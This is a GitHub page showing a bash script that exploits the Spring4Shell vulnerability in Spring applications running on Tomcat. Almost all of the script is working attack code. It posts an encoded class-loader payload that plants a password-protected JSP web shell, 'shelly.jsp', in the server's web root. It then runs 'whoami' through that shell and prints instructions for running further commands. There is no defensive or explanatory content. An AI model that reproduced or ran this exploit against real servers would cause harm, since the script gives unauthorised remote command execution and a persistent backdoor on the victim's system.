-
Notifications
You must be signed in to change notification settings - Fork 1
/
spring4shell-exploit.sh
executable file
·41 lines (32 loc) · 1.6 KB
/
spring4shell-exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/bin/bash
set -euo pipefail
IFS=$'\n\t'
## Example Usage
## expoit.sh ROOT_URL CONTEXT_PATH
## exploit.sh http://my-ip:port/ my-app/form-post-page
if [ "$#" -ne 2 ]; then
echo "Usage: expoit.sh ROOT_URL CONTEXT_PATH"
echo "exploit.sh http://my-ip:port/ my-app/my-form-post-page"
exit 1
fi
ROOT_URL=$1
CONTEXT_PATH=$2
DATA="class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shelly&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
echo "Creating shelly.jsp exploit. posting to '$ROOT_URL/$CONTEXT_PATH'"
echo
curl --fail -H "suffix: %>//" \
-H "c1: Runtime" \
-H "c2: <%" \
-v -d "$DATA" \
$ROOT_URL/$CONTEXT_PATH
SHELL_URL="$ROOT_URL/shelly.jsp?pwd=j&cmd=whoami"
echo
echo
echo "Was exploit created?"
echo "Running whoami with the exploit."
echo "curl --fail -v --output - '$SHELL_URL'"
curl --fail -v --output - $SHELL_URL
echo
echo "Exploit ran successfully."
echo "Try manually running (after a small delay):"
echo "curl --fail -v --output - '$SHELL_URL'"